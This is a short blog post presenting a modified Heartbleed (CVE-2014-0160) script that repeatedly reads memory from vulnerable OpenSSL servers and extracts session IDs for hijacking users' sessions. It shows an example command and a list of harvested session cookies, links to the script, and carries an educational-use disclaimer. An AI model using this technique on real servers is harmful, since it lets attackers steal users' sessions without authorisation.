Edit: Many people have commented on the fact that this would very likely land you in prison if you were to use it on unauthorized servers. This and any other exploit code you use on servers that you do not own is very much against the law. This code is for educational purposes only, and I take no resonsiblility for you doing something stupid with it.

If you have been living under a rock recently, Heartbleed is a bug in OpenSSL that allows anyone on the internet to read sections of memory on vulnerable servers.

Matthew Sullivan posted a blog post earlier today about using CVE-2014–0160 to hijack user sessions from vulnerable servers. I altered the proof of concept code written by Jared Stafford to continuously query a given server for memory chunks and parse those chunks for session ids.

Some very simple checks are in place to only spit out unique session IDs. You can check out Sullivan’s blog post to see how these session IDs can be inserted into a web browser to steal these users sessions.

Example output:

➜ ~ ./heartbleed-altered.py your_server.com session

session=1395650268
session=1552654927
session=9074328142
session=1584630615
session=1399867484
session=1570915943
session=6442471150
session=1134475661
session=1828846521
session=1025417958
session=1429746458
session=9503698952
session=3413620908
session=5569288762
session=3669059145
session=1624974555
session=1070329834
session=1747925477
session=1129670396
session=1017137517
session=2331559646

Altered Script is available at https://gist.github.com/mpdavis/10171593